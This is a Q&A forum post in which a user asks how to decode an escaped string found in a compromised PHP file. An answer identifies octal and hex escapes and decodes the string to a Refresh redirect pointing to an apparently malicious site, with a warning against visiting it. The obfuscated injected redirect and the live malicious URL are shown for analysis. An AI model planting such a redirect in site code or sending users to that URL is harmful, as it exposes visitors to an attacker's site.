# What kind of encoding is this?

Tags: apache-http-server, php, url

I found some base64 encoded text in a compromised php file. When I decoded the base64 string, it was the following directive:

```
header("R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"");
```

What kind of encoding is that URL string? I thought hex initially, then ascii, but its variable length. I did google, but to no avail. Can someone point me in the right direction?

Answer (score 5):

> #### Warning:
>
> The below URL comes from a compromised website.
>
> Visiting it benefits the attacker financially and might harm your computer.

The string means

```
Refresh: 25; url="http://fcbarcelonadodocom.info/uk"
```

`\145` is code point 145 (octal), `\x66` is code point 66 (hexadecimal).

To verify:

1. Execute

   ```
   php
   ```
2. Type

   ```
   <?php
       echo "R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"";
   ?>
   ```
3. Press <kbd>Ctrl</kbd> + <kbd>D</kbd>.

Comment: I also tried the string in Python, which printed the same thing.  Just as an alternative option for the OP. (Just var = "R\145\x66..." and print(var) in IDLE or wherever).